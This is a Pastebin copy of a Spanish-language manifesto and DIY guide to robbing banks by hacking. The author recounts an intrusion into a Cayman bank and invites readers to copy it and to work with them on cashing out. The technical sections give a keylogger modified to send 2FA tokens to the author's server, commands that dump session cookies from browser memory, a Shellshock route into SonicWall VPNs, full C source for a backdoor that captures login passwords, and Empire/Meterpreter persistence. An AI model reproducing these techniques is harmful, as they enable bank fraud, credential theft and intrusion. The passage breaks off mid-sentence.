Advertisement
Guest User

Untitled

a guest
Nov 20th, 2019
5,890
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 70.34 KB | None | 0 0
  1. https://twitter.com/DDoSecrets/status/1195904140213465089
  2.  
  3. https://data.ddosecrets.com/file/Sherwood/
  4.  
  5. https://data.ddosecrets.com/file/Sherwood/HackBack.txt
  6.  
  7.  
  8. _ _ _ ____ _ _
  9. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  10. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  11. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  12. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  13.  
  14. Una guía DIY para robar bancos
  15.  
  16.  
  17. ^__^
  18. (oo)\_______
  19. ( (__)\ )\/\
  20. _) / ||----w |
  21. (.)/ || ||
  22. `'
  23. Por el Subcowmandante Marcos
  24.  
  25.  
  26.  
  27.  
  28. Soy un niño salvaje
  29. Inocente, libre, silvestre
  30. Tengo todas las edades
  31. Mis abuelos viven en mí
  32.  
  33. Soy hermano de las nubes
  34. Y sólo sé compartir
  35. Sé que todo es de todos
  36. que todo está vivo en mí
  37.  
  38. Mi corazón es una estrella
  39. Soy hijo de la tierra
  40. Viajo a bordo de mi espíritu
  41. Camino a la eternidad
  42.  
  43.  
  44. Ésta es mi palabra sencilla que busca tocar el corazón de la gente simple y
  45. humilde, pero también digna y rebelde. Ésta es mi palabra sencilla para contar
  46. de mis hackeos, y para invitar a otras personas a que hackeen con alegre
  47. rebeldía.
  48.  
  49. Hackeé un banco. Lo hice para dar una inyección de liquidez, pero esta vez desde
  50. abajo y a la gente simple y humilde que resiste y se rebela contra las
  51. injusticias en todo el mundo. En otras palabras: robé un banco y regalé el
  52. dinero. Pero no fui yo sola quien lo hizo. El movimiento del software libre, la
  53. comunidad del powershell ofensivo, el proyecto metasploit y la comunidad hacker
  54. en general son las que posibilitaron este hackeo. La comunidad de exploit.in
  55. hizo posible convertir la intrusión en las computadoras de un banco en efectivo
  56. y bitcoin. Los proyectos Tor, Qubes y Whonix, junto a las y los criptógrafos y
  57. activistas que defienden la privacidad y el anonimato, son mis nahuales, es
  58. decir, mis protectores [1]. Me acompañan cada noche y hacen posible que siga en
  59. libertad.
  60.  
  61. No hice nada complicado. Solamente vi la injusticia en este mundo, sentí amor
  62. por todos los seres, y expresé ese amor de la mejor forma que pude, mediante las
  63. herramientas que sé usar. No me mueve el odio a los bancos, ni a los ricos, sino
  64. un amor por la vida, y el deseo de un mundo donde cada quien pueda realizar su
  65. potencial y vivir una vida plena. Quisiera explicar un poco cómo veo el mundo,
  66. para que puedan hacerse una idea de cómo es que llegué a sentirme y actuar así.
  67. Y espero también que esta guía sea una receta que puedan seguir, combinando los
  68. mismos ingredientes para hornear el mismo bizcocho. Quién sabe, por ahí estas
  69. herramientas tan potentes acaban sirviéndoles también a ustedes para expresar el
  70. amor que sienten.
  71.  
  72.  
  73. Todos somos niños salvajes
  74. inocentes, libres, silvestres
  75.  
  76. Todos somos hermanos de los árboles
  77. hijos de la tierra
  78.  
  79. Sólo tenemos que poner en nuestro corazón
  80. una estrella encendida
  81.  
  82. (canción de Alberto Kuselman y Chamalú)
  83.  
  84.  
  85. La policía va a invertir un chingo de recursos en investigarme. Creen que el
  86. sistema funciona, o al menos que funcionará una vez que atrapen a todos los
  87. "chicos malos". No soy más que el producto de un sistema que no funciona.
  88. Mientras existan la injusticia, la explotación, la alienación, la violencia y la
  89. destrucción ecológica, vendrán muchas más como yo: una serie interminable de
  90. personas que rechazarán por ilegítimo el mal sistema responsable de este
  91. sufrimiento. Ese sistema mal hecho no se va a componer arrestándome. Soy
  92. solamente una de las millones de semillas que Tupac plantó hace 238 años en La
  93. Paz [2], y espero que mis acciones y escritos rieguen la semilla de la rebelión
  94. en sus corazones.
  95.  
  96. [1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
  97. [2] fue antes de ser asesinado por los españoles, justo un día como ayer, que
  98. dijo eso de "a mi solo me matarán, pero mañana volveré y seré millones".
  99.  
  100. ____________________________________________
  101. < Para que nos vieran, nos tapamos el rostro >
  102. --------------------------------------------
  103. \
  104. \ ^__^
  105. (oo)\_______
  106. ( (__)\ )\/\
  107. _) / ||----w |
  108. (.)/ || ||
  109. `'
  110. Para hacernos escuchar, a lxs hackers a veces nos toca taparnos la cara, porque
  111. no nos interesa que vean nuestro rostro sino que entiendan nuestra palabra. La
  112. máscara puede ser de Guy Fawkes, de Salvador Dalí, de Fsociety, o en algún caso
  113. la marioneta de un sapo con cresta. Por afinidad, esta vez fui a desenterrar a
  114. un difunto para prestarme su pasamontañas. Creo entonces que debería aclarar que
  115. el Sup Marcos es inocente de todo lo que aquí se cuenta porque, además de estar
  116. muerto, no le consulté. Espero que su fantasma, si se entera desde alguna hamaca
  117. chiapaneca, sepa encontrar la bondad para, como dicen allá, "desestimar este
  118. deep fake" con el mismo gesto con que se aleja un insecto inoportuno - que bien
  119. podría ser un escarabajo.
  120.  
  121. Aún así con el pasamontañas y el cambio de nombre, muchos de los que apoyan mis
  122. acciones quizás van a prestar demasiada atención a mi persona. Con su propia
  123. autonomía hecha trizas por una vida entera de dominación, estarán buscando un
  124. líder a seguir, o una heroína que les salve. Pero detrás del pasamontañas sólo
  125. soy una niña. Todos somos niños salvajes. Nós só temos que colocar uma estrela
  126. em chamas em nossos corações.
  127.  
  128.  
  129.  
  130. --[ 1 - Por qué expropiar ]-----------------------------------------------------
  131.  
  132. El capitalismo es un sistema en el que una minoría se ha venido a apropiar de
  133. una vasta mayoría de los recursos del mundo a través de la guerra, el hurto y
  134. la explotación. Al arrebatarnos los comunes [1], forzaron a los de abajo a
  135. estar bajo el control de esa minoría que todo lo posee. Es un sistema
  136. fundamentalmente incompatible con la libertad, la igualdad, la democracia y el
  137. Suma Qamaña (Buen Vivir). Puede sonar ridículo para las que hemos crecido en una
  138. maquinaria propagandística que nos enseñó que capitalismo es libertad, pero en
  139. verdad esto que digo no es una idea nueva ni controvertida [2]. Los fundadores
  140. de los Estados Unidos de América sabían que tenían que elegir entre crear una
  141. sociedad capitalista, o una libre y democrática. Madison reconocía que "el
  142. hombre que posee riqueza, el que se acuesta en su sofá o rueda en su carruaje,
  143. no puede juzgar los deseos o sentimientos del jornalero". Pero para protegerse
  144. frente al "espíritu de equiparación" de los jornaleros sin tierra, le pareció
  145. que solamente los terratenientes debían votar, y que el gobierno tenía que
  146. servir para "proteger a la minoria opulenta frente a la gran mayoria". John
  147. Jay fue más al grano y dijo: "Aquellos que son dueños del país deberían
  148. gobernarlo".
  149.  
  150. ____________________________________________________
  151. / No existe eso que llaman capitalismo verde. \
  152. | Hagamos al capitalismo historia antes de que nos |
  153. \ convierta en historia. /
  154. ----------------------------------------------------
  155. \ /\ ___ /\
  156. \ // \/ \/ \\
  157. (( O O ))
  158. \\ / \ //
  159. \/ | | \/
  160. | | | | Evgeny, el gran elefante ignorado, no entiende por qué todos
  161. | | | | fingen no verle en los paneles sobre cambio climático, así
  162. | o | que aquí le doy chance a decir sus líneas.
  163. | | | |
  164. |m| |m|
  165.  
  166.  
  167. De la misma forma que bell hooks [3] sostiene que el rechazo a la cultura
  168. patriarcal de dominación es un acto en defensa del propio interés del varón (ya
  169. que emocionalmente les mutila y evita que sientan amor y conexión de forma
  170. plena), creo que la cultura de dominación del capitalismo tiene un efecto
  171. similar sobre los ricos, y que podrían tener vidas más plenas y satisfactorias
  172. si rechazaran el sistema de clases del que creen que se benefician. Para muchos,
  173. el privilegio de clase equivale a una infancia de negligencia emocional, seguida
  174. de una vida de interacciones sociales superficiales y trabajo sin sentido. Puede
  175. que en el fondo sepan que sólo pueden conectar de forma genuina con las personas
  176. cuando trabajan con ellas como sus iguales, y no cuando las ponen a su servicio.
  177. Puede que sepan que compartir su riqueza material es lo mejor que pueden hacer
  178. con ella. Quizás sepan también que las experiencias significativas, las
  179. conexiones y las relaciones que cuentan no son las que provienen de las
  180. interacciones mercantiles, sino precisamente de rechazar la lógica del mercado
  181. y dar sin esperar nada a cambio. Tal vez sepan que todo lo que necesitan para
  182. escapar de su prisión y vivir de verdad es dejarse llevar, ceder el control, y
  183. dar un salto de fe. Pero a la mayoría les falta valentía.
  184.  
  185. Entonces sería ingenuo por nuestra parte dirigir nuestros esfuerzos a tratar de
  186. producir alguna clase de despertar espiritual en los ricos [4]. Como dice Assata
  187. Shakur: "Nadie en el mundo, nadie en la historia, ha conseguido nunca su
  188. libertad apelando al sentido moral de sus opresores". En realidad, cuando los
  189. ricos reparten su dinero, casi siempre lo hacen de un modo que refuerza el
  190. sistema que para empezar les permitió amasar sus enormes e ilegítimas riquezas
  191. [5]. Y es poco probable que el cambio venga a través de un proceso político;
  192. como dice Lucy Parsons: "No nos dejemos nunca engañar con que los ricos nos
  193. vayan a dejar votar para arrebatarles sus riquezas". Colin Jenkins justifica la
  194. expropiación con estas palabras [6]:
  195.  
  196. No nos equivoquemos, la expropiación no es robo. No es la confiscación de
  197. dinero ganado "con el sudor de la frente". No es el robo de propiedad
  198. privada. Es, más bien, la recuperación de enormes cantidades de tierra y
  199. riqueza que han sido forjadas con recursos naturales robados, esclavitud
  200. humana, fuerza de trabajo forzada y amasada en cientos de años por una
  201. pequeña minoría. Esta riqueza... es ilegítima, tanto a efectos morales como
  202. en tanto a los mecanismos de explotación que se han empleado para crearla.
  203.  
  204. Para Colin, el primer paso es que "tenemos que liberarnos de nuestras ataduras
  205. mentales (al creer que la riqueza y la propiedad privada han sido ganadas por
  206. quienes las monopolizan; y que, por tanto, deberían ser algo a respetar,
  207. reverenciar, e incluso algo a perseguir), abrir nuestras mentes, estudiar y
  208. aprender de la historia, y reconocer juntos esta ilegitimidad". Acá les dejo
  209. algunos libros que me han ayudado con esto [7][8][9][10][11].
  210.  
  211. Según Barack Obama, la desigualdad económica es "el desafío que define a nuestro
  212. tiempo". El hacking informático es una herramienta poderosa para combatir la
  213. desigualdad económica. El antiguo director de la NSA, Keith Alexander, concuerda
  214. y dice que el hacking es responsable de "la mayor transferencia de riqueza de la
  215. historia".
  216.  
  217. _________________________
  218. / La historia es nuestra \
  219. \ y la hacen lxs hackers! /
  220. -------------------------
  221. \
  222. \ ^__^
  223. (oo)\_______
  224. ( (__)\ )\/\
  225. _) / ||----w |
  226. (.)/ || ||
  227. `'
  228. ¡Allende presente, ahora y siempre!
  229.  
  230. [1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
  231. [2] https://chomsky.info/commongood02/
  232. [3] The Will to Change: Men, Masculinity, and Love
  233. [4] su propia religión ya es muy clara al respecto:
  234. https://dailyverses.net/es/materialismo
  235. [5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
  236. [6] http://www.hamptoninstitution.org/expropriation-or-bust.html
  237. [7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era
  238. de los Dioses Enmascarados y los Reyes Cubiertos
  239. [8] Calibán y la Bruja
  240. [9] En deuda: Una historia alternativa de la economía
  241. [10] La otra historia de los Estados Unidos
  242. [11] Las venas abiertas de América Latina
  243.  
  244.  
  245.  
  246. _________________________________
  247. < Nuestra arma es nuestro teclado >
  248. ---------------------------------
  249. \
  250. \ ^__^
  251. (oo)\_______
  252. ( (__)\ )\/\
  253. _) / ||----w |
  254. (.)/ || ||
  255. `' ^^ ^^
  256.  
  257. --[ 2 - Introducción ]----------------------------------------------------------
  258.  
  259. Esta guía explica cómo fue que hice el hackeo al Cayman Bank and Trust Company
  260. (Isla de Man). ¿Por qué estoy publicando esto, casi cuatro años después?
  261.  
  262. 1) Para mostrar lo que es posible
  263.  
  264. Los hackers que trabajan por el cambio social se han limitado a desarrollar
  265. herramientas de seguridad y privacidad, DDoS, realizar defaceos y filtraciones.
  266. Allá por donde vayas hay proyectos radicales por un cambio social en completo
  267. estado de precariedad, y sería mucho lo que podrían hacer con un poco de dinero
  268. expropiado. Al menos para la clase trabajadora, el robo de un banco es algo
  269. socialmente aceptado, y a los que lo hacen se les ve como héroes del pueblo. En
  270. la era digital, robar un banco es un acto no violento, menos arriesgado, y la
  271. recompensa es mayor que nunca. Entonces ¿por qué son solamente los hackers de
  272. sombrero negro que lo hacen para beneficio personal de ellos, y nunca los
  273. hacktivistas para financiar proyectos radicales? Quizás no se creen que son
  274. capaces de hacerlo. Los grandes hackeos bancarios salen en los noticieros cada
  275. tanto, como el hackeo al Banco de Bangladesh [1], que fue atribuido a Corea del
  276. Norte, o los hackeos a bancos atribuidos al grupo Carbanak [2], al que describen
  277. como un grupo muy grande y bien organizado de hackers rusos, con distintos
  278. miembros que estarían especializados en diferentes tareas. Y, pues no es tan
  279. complicado.
  280.  
  281. Es por nuestra creencia colectiva en que el sistema financiero es incuestionable
  282. que ejercemos control sobre nosotras mismas, y mantenemos el sistema de clases
  283. sin que los de arriba tengan que hacer nada [3]. Poder ver cómo de vulnerable y
  284. frágil es en realidad el sistema financiero nos ayuda a romper esa alucinación
  285. colectiva. Por eso los bancos tienen un fuerte incentivo para no reportar los
  286. hackeos, y para exagerar cómo de sofisticados son los atacantes. Ninguno de los
  287. hackeos financieros que hice, o de los que he sabido, ha sido nunca reportado.
  288. Este va a ser el primero, y no porque el banco quisiera, sino porque yo me
  289. decidí a publicarlo.
  290.  
  291. Como estás a punto de aprender en esta guía casera, hackear un banco y
  292. transferir los dineros a través de la red SWIFT no requiere del apoyo de ningún
  293. gobierno, ni de un grupo grande y especializado. Es algo totalmente posible
  294. siendo un mero hacker aficionado y del montón, con tan solo herramientas
  295. públicas y conocimientos básicos de cómo se escribe un script.
  296.  
  297. [1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
  298. [2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
  299. [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
  300.  
  301. 2) Ayudar a retirar el efectivo
  302.  
  303. Muchos de los que lean esto ya tienen, o con un poco de estudio van a ser
  304. capaces de adquirir, las habilidades necesarias para llevar a cabo un hackeo
  305. como este. Sin embargo, muchos se van a encontrar con que les faltan las
  306. conexiones criminales necesarias para sacar los mangos en condiciones. En mi
  307. caso, este era el primer banco que hackeaba, y en ese momento sólo tenía unas
  308. pocas y mediocres cuentas preparadas para poder retirar el efectivo (conocidas
  309. como bank drops), así que solamente fueron unos cuantos cientos de miles los que
  310. pude retirar en total, cuando lo normal es sacar millones. Ahora, en cambio, sí
  311. que tengo el conocimiento y las conexiones para sacar efectivo más en serio, de
  312. modo que si se encuentran hackeando un banco pero necesitan ayuda para convertir
  313. eso en dinero de a de veras, y quieren usar esa lana para financiar proyectos
  314. sociales radicales, se ponen en contacto conmigo.
  315.  
  316. 3) Colaborar
  317.  
  318. Es posible hackear bancos como una aficionada que trabaja en solitario, pero la
  319. neta es que, por lo general, no es tan fácil como lo pinto acá. Tuve suerte con
  320. este banco por varias razones:
  321.  
  322. 1) Era un banco pequeño, por lo que me tomó mucho menos tiempo llegar a
  323. comprender cómo funcionaba todo.
  324.  
  325. 2) No tenían ningún procedimiento para revisar los mensajes swift enviados.
  326. Muchos bancos tienen uno, y necesitas escribir código para esconder tus
  327. transferencias de su sistema de monitorización.
  328.  
  329. 3) Sólo usaban autenticación por contraseña para acceder a la aplicación con la
  330. que se conectaban a la red SWIFT. La mayoría de los bancos ahora usan RSA
  331. SecurID, o alguna forma de 2FA. Puedes saltarte esto escribiendo código para
  332. recibir una alerta cuando entren su token, y así poder usarlo antes de que
  333. expire. Es más sencillo de lo que parece: he usado Get-Keystrokes [1],
  334. modificándolo para que en vez de almacenar las teclas pulsadas, se haga una
  335. petición GET a mi servidor cada vez que se detecta que han introducido un
  336. nombre de usuario. Esta petición añade el nombre de usuario a la url y,
  337. conforme tipean el token, se hacen varios GET con los dígitos del token
  338. concatenados a la url. En mi lado dejo esto corriendo mientras tanto:
  339.  
  340. ssh yo@mi_servidor_secreto 'tail -f /var/log/apache2/access_log'
  341. | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
  342.  
  343. Si es una aplicación web, puedes saltarte el 2FA robándoles la cookie
  344. después de que se hayan autenticado. No soy un APT con un equipo de coders
  345. que puedan hacerme herramientas a medida. Soy una persona sencilla que vive
  346. de lo que le da la terminal [2], de modo que lo que uso es:
  347.  
  348. procdump64 /accepteula -r -ma PID_del_browser
  349. strings64 /accepteula *.dmp | findstr PHPSESSID 2> nul
  350.  
  351. o pasándolo por findstr antes que por strings, lo que lo hace mucho más
  352. rápido:
  353.  
  354. findstr PHPSESSID *.dmp > tmp
  355. strings64 /accepteula tmp | findstr PHPSESSID 2> nul
  356.  
  357. Otra forma de saltártelo es accediendo a su sesión con un VNC oculto (hvnc)
  358. después de que se hayan autenticado, o con un poco de creatividad también
  359. podrías enfocarte en otra parte de su proceso en lugar de enviar mensajes
  360. SWIFT directamente.
  361.  
  362. Creo que si colaborase con otros hackers bancarios con experiencia podríamos
  363. hacernos cientos de bancos como Carnabak, en vez de estar haciendo uno de tanto
  364. en tanto por mi cuenta. Así que si tienes experiencia con hackeos similares y
  365. quieres colaborar, contactame. Encontrarás mi correo y mi llave PGP al final de
  366. la guía anterior [3].
  367.  
  368. [1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
  369. Exfiltration/Get-Keystrokes.ps1
  370. [2] https://lolbas-project.github.io/
  371. [3] https://www.exploit-db.com/papers/41914
  372.  
  373. ________________________________________
  374. / Si robar un banco cambiara las cosas, \
  375. \ lo harían ilegal /
  376. ----------------------------------------
  377. \
  378. \ ^__^
  379. (oo)\_______
  380. ( (__)\ )\/\
  381. _) / ||----w |
  382. (.)/ || ||
  383. `'
  384.  
  385. --[ 3 - Tengan cuidado ahí fuera ]----------------------------------------------
  386.  
  387. Es importante tomar algunas precauciones sencillas. Voy a remitirme a esta
  388. misma sección de mi última guía [1], ya que por lo visto funciona bien nomás
  389. [2]. Todo lo que tengo que añadir es que, en palabras de Trump, "A menos que
  390. atrapes a los hackers in fraganti, es rete-difícil determinar quién es que
  391. estaba realizando el hackeo", de modo que la policía se está volviendo más y más
  392. creativa [3][4] en sus intentos de agarrar a los criminales en el acto (cuando
  393. sus discos duros cifrados están desbloqueados). Así que estaría bueno si por
  394. ejemplo llevas encima un cierto dispositivo bluetooth y configuras tu
  395. computadora para que se apague cuando se aleje más allá de un cierto rango, o
  396. cuando un acelerómetro detecta movimiento, o algo por el estilo.
  397.  
  398. Puede que escribir artículos largos detallando tus acciones y tu ideología no
  399. sea la cosa más segura del mundo (¡ups!), pero a ratos siento que tenía que
  400. hacerlo.
  401.  
  402. Si no creyera en quien me escucha
  403. Si no creyera en lo que duele
  404. Si no creyera en lo que quede
  405. Si no creyera en lo que lucha
  406. Que cosa fuera...
  407. ¿Que cosa fuera la maza sin cantera?
  408.  
  409. [1] https://www.exploit-db.com/papers/41914
  410. [2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
  411. phineas-fisher.html
  412. [3] https://www.wired.com/2015/05/silk-road-2/
  413. [4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
  414. alphabay-arrest-video
  415.  
  416.  
  417. ,-\__
  418. |f-"Y\ ____________________
  419. \()7L/ | ¡Sé gay! |
  420. cgD | ¡Haz el crimen! | __ _
  421. |\( --------------------- .' Y '>,
  422. \ \ \ / _ _ \
  423. \\\ \ )(_) (_)(|}
  424. \\\ { 4A } /
  425. \\\ \uLuJJ/\l
  426. \\\ |3 p)/
  427. \\\___ __________ /nnm_n//
  428. c7___-__,__-)\,__)(". \_>-<_/D
  429. //V \_"-._.__G G_c__.-__<"/ ( \
  430. <"-._>__-,G_.___)\ \7\
  431. ("-.__.| \"<.__.-" ) \ \
  432. |"-.__"\ |"-.__.-".\ \ \
  433. ("-.__"". \"-.__.-".| \_\
  434. \"-.__""|!|"-.__.-".) \ \
  435. "-.__""\_|"-.__.-"./ \ l
  436. ".__""">G>-.__.-"> .--,_
  437. "" G
  438.  
  439. Muchos culpan a las personas queer del declive de esta sociedad;
  440. estamos orgullosxs de ello
  441. Algunos creen que queremos reducir a cenizas
  442. esta civilización y su tejido moral;
  443. No podrían estar más en lo cierto
  444. Con frecuencia nos describen como depravadxs, decadentes y revoltosxs
  445. Pero ¡ay! No han visto nada todavía
  446.  
  447. https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime
  448.  
  449.  
  450. --[ 4 - Conseguir acceso ]------------------------------------------------------
  451.  
  452. En otro lugar [1] les platicaba acerca de las vías principales para conseguir
  453. acceso inicial a la red de una compañía durante un ataque dirigido. Sin embargo,
  454. éste no era un ataque dirigido. No me propuse hackear un banco específico, lo
  455. que quería era hackear cualquier banco, lo cual termina siendo una tarea mucho
  456. más sencilla. Este tipo de enfoque inespecífico fue popularizado por Lulzsec y
  457. Anonymous [2]. Como parte de [1], preparé un exploit y unas herramientas de
  458. post-explotación para un dispositivo de VPN popular. Luego me puse a escanear la
  459. internet entera con zmap [3] y zgrab para identificar otros dispositivos
  460. vulnerables. Hice que el escaner guardara las IPs vulnerables, junto con el
  461. "common name" y los "alt names" del certificado SSL del dispositivo, los nombres
  462. de dominio de windows del dispositivo, y la búsqueda DNS inversa de la IP. Le
  463. hice un grep al resultado en busca de la palabra "banco", y había bastante para
  464. elegir, pero la verdad es que me atrajo la palabra "Cayman", y fue así que vine
  465. a quedarme con este.
  466.  
  467. [1] https://www.exploit-db.com/papers/41914
  468. [2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
  469. [3] https://github.com/zmap/zmap
  470.  
  471.  
  472. ----[ 4.1 - El Exploit ]--------------------------------------------------------
  473.  
  474. Cuando publiqué mi última guía DIY [1] no revelé los detalles del exploit de
  475. sonicwall que había usado para hackear a Hacking Team, ya que era muy útil para
  476. otros hackeos, como este mismo, y todavía no había acabado de divertirme con él.
  477. Determinada entonces a hackear a Hacking Team, pasé semanas haciendo ingeniería
  478. inversa a su modelo del ssl-vpn de sonicwall, e incluso conseguí encontrar
  479. varias vulnerabilidades de corrupción de memoria más o menos difíciles de
  480. explotar, antes de darme cuenta de que el dispositivo era fácilmente explotable
  481. con shellshock [2]. Cuando salió shellshock, muchos dispositivos sonicwall eran
  482. vulnerables, sólo con una petición a cgi-bin/welcome, y un payload en el
  483. user-agent. Dell sacó una actualización de seguridad y un advisory para estas
  484. versiones. La versión usada por Hacking Team y este banco tenía la versión de
  485. bash vulnerable, pero las peticiones cgi no disparaban el shellshock excepto por
  486. las peticiones a un shell script, y justo había uno accesible:
  487. cgi-bin/jarrewrite.sh. Esto parece que se les escapó a los de Dell en su nota,
  488. ya que nunca sacaron una actualización de seguridad ni un advisory para esa
  489. versión del sonicwall. Y, amablemente, Dell había hecho dos2unix setuid root,
  490. dejando un dispositivo fácil de rootear.
  491.  
  492. En mi última guía muchos leyeron que pasé semanas investigando un dispositivo
  493. hasta dar con un exploit, y asumieron que eso significaba que yo era algún tipo
  494. de hacker de élite. La realidad, es decir, el hecho de que me llevó dos semanas
  495. darme cuenta de que era trivialmente explotable con shellshock, es tal vez menos
  496. halagadora para mí, pero pienso que también es más inspiradora. Demuestra que
  497. de verdad tú puedes hacer esto por tí misma. No necesitas ser un genio, yo
  498. ciertamente no lo soy. En realidad mi trabajo contra Hacking Team comenzó un
  499. año antes. Cuando descubrí a Hacking Team y al Grupo Gamma en las
  500. investigaciones de CitizenLab [3][4], decidí explorar un poco y ver si podía
  501. encontrar algo. No llegué a ninguna parte con Hacking Team, pero tuve suerte con
  502. Gamma Group, y pude hackear su portal de atención al cliente con inyección sql
  503. básica y vulnerabilidades de subida de archivos [5][6]. Sin embargo, a pesar de
  504. que su servidor de soporte me daba un pivote hacia la red interna de Gamma
  505. Group, fui incapaz de penetrar mas allá en la compañía. A partir de esta
  506. experiencia con el Grupo Gamma y otros hacks, me di cuenta de que estaba
  507. realmente limitada por mi falta de conocimiento sobre escalada de privilegios y
  508. movimiento lateral en dominios windows, active directory y windows en general.
  509. Así que estudié y practiqué (ver sección 11), hasta que sentí que estaba lista
  510. para volver a hacerle una visita a Hacking Team casi un año después. La práctica
  511. dio sus frutos, y esa vez fui capaz de realizar un compromiso completo de la
  512. compañía [7]. Antes de darme cuenta de que podía entrar con shellshock, estaba
  513. dispuesta a pasar meses enteros feliz de la vida estudiando desarrollo de
  514. exploits y escribiendo un exploit confiable para una de las vulnerabilidades de
  515. corrupción de memoria que había encontrado. Sólo sabía que Hacking Team
  516. necesitaba ser expuesto, y que me tomaría tanto tiempo como fuese necesario y
  517. aprendería lo que tuviese que aprender para conseguirlo. Para realizar estos
  518. hacks no necesitas ser brillante. Ni siquiera necesitas un gran conocimiento
  519. técnico. Sólo necesitas dedicación, y creer en tí misma.
  520.  
  521. [1] https://www.exploit-db.com/papers/41914
  522. [2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
  523. [3] https://citizenlab.ca/tag/hacking-team/
  524. [4] https://citizenlab.ca/tag/finfisher/
  525. [5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
  526. bahrain-track-arab-spring-protesters/
  527. [6] https://www.exploit-db.com/papers/41913
  528. [7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
  529.  
  530.  
  531. ----[ 4.2 - El Backdoor ]-------------------------------------------------------
  532.  
  533. Parte del backdoor que preparé para Hacking Team (véase [1], sección 6) era un
  534. wrapper sencillo sobre la página de login para capturar contraseñas:
  535.  
  536. #include <stdio.h>
  537. #include <unistd.h>
  538. #include <fcntl.h>
  539. #include <string.h>
  540. #include <stdlib.h>
  541.  
  542. int main()
  543. {
  544. char buf[2048];
  545. int nread, pfile;
  546.  
  547. /* jala el log si mandamos una cookie especial */
  548. char *cookies = getenv("HTTP_COOKIE");
  549. if (cookies && strstr(cookies, "nuestra contraseña privada")) {
  550. write(1, "Content-type: text/plain\n\n", 26);
  551. pfile = open("/tmp/.pfile", O_RDONLY);
  552. while ((nread = read(pfile, buf, sizeof(buf))) > 0)
  553. write(1, buf, nread);
  554. exit(0);
  555. }
  556.  
  557. /* el principal almacena los datos del POST y se los envía al hijo,
  558. que es el programa de login real */
  559. int fd[2];
  560. pipe(fd);
  561. pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
  562. if (fork()) {
  563. close(fd[0]);
  564.  
  565. while ((nread = read(0, buf, sizeof(buf))) > 0) {
  566. write(fd[1], buf, nread);
  567. write(pfile, buf, nread);
  568. }
  569.  
  570. write(pfile, "\n", 1);
  571. close(fd[1]);
  572. close(pfile);
  573. wait(NULL);
  574. } else {
  575. close(fd[1]);
  576. dup2(fd[0],0);
  577. close(fd[0]);
  578. execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin",
  579. "userLogin", NULL);
  580. }
  581. }
  582.  
  583. En el caso de Hacking Team, se logueaban a la VPN con passwords de un solo uso,
  584. de modo que la VPN me dio acceso solamente a la red, y a partir de ahí me tomó
  585. un esfuerzo extra conseguir admin de dominio en su red. En la otra guía escribí
  586. sobre pases laterales y escalada de privilegios en dominios windows [1]. En este
  587. caso, en cambio, eran las mismas contraseñas de dominio de windows las que se
  588. usaban para autenticarse contra la VPN, así que pude conseguir un buen de
  589. contraseñas de usuarios, incluyendo la del admin de dominio. Ahora tenía total
  590. acceso a su red, pero usualmente esta es la parte fácil. La parte más complicada
  591. es entender cómo es que operan y cómo sacar el pisto.
  592.  
  593. [1] https://www.exploit-db.com/papers/41914
  594.  
  595.  
  596. ----[ 4.3 - Datos curiosos ]----------------------------------------------------
  597.  
  598. Al seguir la investigación que hicieron sobre el hackeo, me resultó interesante
  599. ver que, por la misma época en que yo lo hice, el banco pudo haber sido
  600. comprometido por alguna otra persona mediante un email de phishing dirigido [1].
  601. Como dice el viejo dicho, "dale a una persona un exploit y tendrá acceso por un
  602. día, enséñale a phishear y tendrá acceso toda su vida" [2]. El hecho de que
  603. alguien más, por casualidad y al mismo tiempo que yo, se pusiera este banco
  604. pequeño en la mira (registraron un dominio similar al dominio real del banco
  605. para poder enviar el phishing desde ahí) hace pensar que los hackeos bancarios
  606. ocurren con mucha más frecuencia de lo que se conoce.
  607.  
  608. Una sugerencia divertida para que puedas seguir las investigaciones de tus
  609. hackeos es tener un acceso de respaldo, uno que no vas a tocar a menos que
  610. pierdas el acceso normal. Tengo un script sencillo que espera comandos una
  611. vez al dia, o menos, sólo para mantener acceso a largo plazo en el caso de
  612. que bloqueen mi acceso regular. Luego tenía un powershell empire [3]
  613. llamando a casa con más frecuencia a una IP diferente, y usaba empire para
  614. lanzar meterpreter [4] contra una tercera IP, donde realizaba la mayor parte de
  615. mi trabajo. Cuando PWC se puso a investigar el hackeo, encontraron mi uso de
  616. empire y meterpreter y limpiaron esas computadoras y bloquearon esas IPs, pero
  617. no detectaron mi acceso de respaldo. PWC habia colocado dispositivos de
  618. monitoreo de red, para poder analizar el tráfico y ver si todavía había
  619. computadoras infectadas, de modo que no quería conectarme mucho a su red. Sólo
  620. lancé mimikatz una vez para obtener las nuevas contraseñas, y a partir de ahí
  621. pude seguir sus investigaciones leyendo sus correos en el outlook web access.
  622.  
  623. [1] página 47, Project Pallid Nutmeg.pdf, en torrent
  624. [2] https://twitter.com/thegrugq/status/563964286783877121
  625. [3] https://github.com/EmpireProject/Empire
  626. [4] https://github.com/rapid7/metasploit-framework
  627.  
  628.  
  629. --[ 5 - Entender las Operaciones Bancarias ]------------------------------------
  630.  
  631. Para entender cómo operaba el banco, y cómo podría sacar dinero, seguí las
  632. técnicas que resumí en [1], en la sección "13.3 - Reconocimiento Interno".
  633. Descargué una lista de todos los nombres de archivos, le hice un grep en busca
